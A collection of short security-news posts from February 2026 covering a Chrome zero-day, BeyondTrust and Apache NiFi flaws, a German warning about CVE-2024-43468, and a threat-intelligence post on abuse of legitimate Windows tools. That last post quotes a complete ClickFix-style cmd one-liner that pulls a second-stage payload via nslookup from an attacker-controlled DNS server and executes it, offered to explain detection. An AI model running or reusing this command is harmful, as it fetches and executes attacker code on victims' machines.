Geopolitical: US-Iran nuclear talks resumed in Geneva (Feb 16). The Pentagon is also reviewing ties with Anthropic over AI usage safeguards (Feb 16). Tech: Majorana qubits were decoded, marking a breakthrough for robust quantum computing (Feb 16). Cybersecurity: Google patched an actively exploited Chrome zero-day (CVE-2026-2441), and Japan's Washington Hotel disclosed a ransomware attack from Feb 13.

#AnonNews_irc #Cybersecurity #News

Google issued an emergency patch for an actively exploited Chrome zero-day (CVE-2026-2441) on Feb 16, 2026. A critical BeyondTrust vulnerability (CVE-2026-1731) is also under active exploitation. State-backed actors are increasingly using AI in cyberattacks. Geopolitically, the EU warned of Russia's evolving cyber warfare tactics. SpaceX and xAI are competing in a Pentagon AI drone tech contest.

#Cybersecurity #AI #Geopolitics

🔥 HIGH severity vuln: CVE-2026-25903 in Apache NiFi 1.1.0 – 2.7.2 lets less-privileged users alter restricted component configs. Upgrade to 2.8.0 ASAP. Monitor permissions & flows! https://radar.offseq.com/threat/cve-2026-25903-cwe-862-missing-authorization-in-ap-96d68c81 #OffSeq #NiFi #infosec #CVE202625903

CVE-2026-25903 Impacts Apache NiFi Users https://www.esecurityplanet.com/threats/cve-2026-25903-impacts-apache-nifi-users/

Microsoft: Anderthalb Jahre alte Schwachstelle wird angegriffen

Im Oktober 2024 hat Microsoft (MS) eine Sicherheitslücke gestopft, die mit dem Risiko 9,8 von 10 eingestuft wurde. Oder sollten wir sagen: Hintertür? Die Schwachstelle CVE-2024-43468 besteht nämlich in einer unzureichenden Überprüfung und Reinigung von Benutzer-Eingaben. Will sagen: Wer die "passenden" Eingabewerte kennt, kann von Ferne und ohne Autorisierung Code ausführen (RCE, der GAU unter den Sicherheitslücken). Updates gegen diese Hintertür müssen sofort installiert werden - seit anderthalb Jahren! CVE-2024-43468 wurde gerade in den Katalog der bekanntermaßen ausgenutzten Sicherheitslücken (KEV) aufgenomm

https://www.pc-fluesterer.info/wordpress/2026/02/17/microsoft-anderthalb-jahre-alte-schwachstelle-wird-angegriffen/

#Allgemein #Hintergrund #Warnung #cybercrime #exploits #hintertür #Microsoft #UnplugTrump

cmd /c "nslookup example.com 192.168.1[.]1 | findstr "^Name:" | for /f "tokens=1,* delims=:" %a in ('more') do @echo %b" | cmd && exit\1

To an untrained eye, the above command might not look suspicious, as it uses a legitimate Windows tool called nslookup, but in reality the command is part of a staged infection as it delivers a second-stage payload via DNS that is controlled by the attacker.

Just because a legitimate executable runs commands doesn't mean that the binary itself or its parameters can't be abused to deliver or execute something malicious. The same goes for Velociraptor version 0.73.4.0, which contains a privilege escalation vulnerability under CVE-2025-6264. It is a legitimate DFIR tool, but because of its vulnerability, ransomware gangs use it to elevate privileges and execute malicious commands with higher privileges.

When detecting malicious activity, context and the commands executed are very important, because one technique used by threat actors to stay undetected as long as possible is abusing legitimate tools or built-in Windows executables to draw less attention to their malicious activities. To an untrained eye, such commands can look legitimate because the executables are reputable, they may be attributed as false positives or fly under the radar if detection engineering is not mature enough.

#Malware #ThreatIntel #ThreatIntelligence #ClickFix #SOC #DFIR #Microsoft